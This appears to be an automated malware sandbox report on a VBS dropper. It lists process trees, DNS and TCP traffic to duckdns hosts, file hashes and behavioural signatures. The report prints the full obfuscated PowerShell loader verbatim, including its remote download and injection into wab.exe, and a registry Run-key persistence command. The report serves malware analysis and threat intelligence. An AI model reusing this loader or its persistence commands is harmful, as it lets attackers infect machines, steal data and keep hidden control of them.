Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pqoeos"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 12.187.247.84.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 125.68.49.198.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 odogwuvisual123.duckdns.org udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 32.138.123.206.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 194.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/3488-0-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

memory/3488-1-0x0000021A4F9B0000-0x0000021A4F9D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixc22uig.iqd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3488-11-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

memory/3488-12-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

memory/3300-15-0x0000000004C90000-0x0000000004CC6000-memory.dmp

memory/3300-16-0x0000000005300000-0x0000000005928000-memory.dmp

memory/3300-17-0x00000000059A0000-0x00000000059C2000-memory.dmp

memory/3300-18-0x0000000005B40000-0x0000000005BA6000-memory.dmp

memory/3300-19-0x0000000005BB0000-0x0000000005C16000-memory.dmp

memory/3300-29-0x0000000005C20000-0x0000000005F74000-memory.dmp

memory/3300-30-0x0000000006220000-0x000000000623E000-memory.dmp

memory/3300-31-0x00000000067B0000-0x00000000067FC000-memory.dmp

memory/3300-32-0x0000000007A70000-0x00000000080EA000-memory.dmp

memory/3300-33-0x0000000006730000-0x000000000674A000-memory.dmp

memory/3300-34-0x00000000074C0000-0x0000000007556000-memory.dmp

memory/3300-35-0x0000000007450000-0x0000000007472000-memory.dmp

memory/3300-36-0x00000000086A0000-0x0000000008C44000-memory.dmp

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

memory/3300-38-0x0000000008C50000-0x000000000B519000-memory.dmp

memory/3488-39-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

memory/3488-40-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

memory/3488-48-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

memory/3044-45-0x0000000001E60000-0x0000000004729000-memory.dmp

memory/2764-52-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4532-53-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2764-54-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4532-57-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2764-56-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3692-61-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3692-59-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4532-55-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3692-58-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk

MD5 18b6368b183e546a35847ae24b4b2913
SHA1 040545f7ac2c987d2a79b5e7f1cf9ab83bd25923
SHA256 54c101b6b1241b6a0574a66e5a5b9bddc6c60a4daf7338dba6fe3f65b27382af
SHA512 68ba8734016705cd12bf9d7ce41d5c823b2ec6ce9ee1ee7e9da9efcd9c88ef1f1b18148d91ad6a271c7a88d4ca098a99198ca709fcf217f9b1fa18f74c48d698

memory/3044-66-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

memory/3044-70-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

memory/3044-69-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 14:59

Reported

2024-05-21 15:02

Platform

win7-20240221-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 596 set thread context of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 1676 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 1676 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 1676 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 1208 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1676 wrote to memory of 1208 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1676 wrote to memory of 1208 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2240 wrote to memory of 2360 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2360 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2360 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 596 wrote to memory of 516 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 596 wrote to memory of 516 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 596 wrote to memory of 516 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 596 wrote to memory of 516 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2468 wrote to memory of 1348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2468 wrote to memory of 1348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2468 wrote to memory of 1348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2468 wrote to memory of 1348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1348 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1348 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1348 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 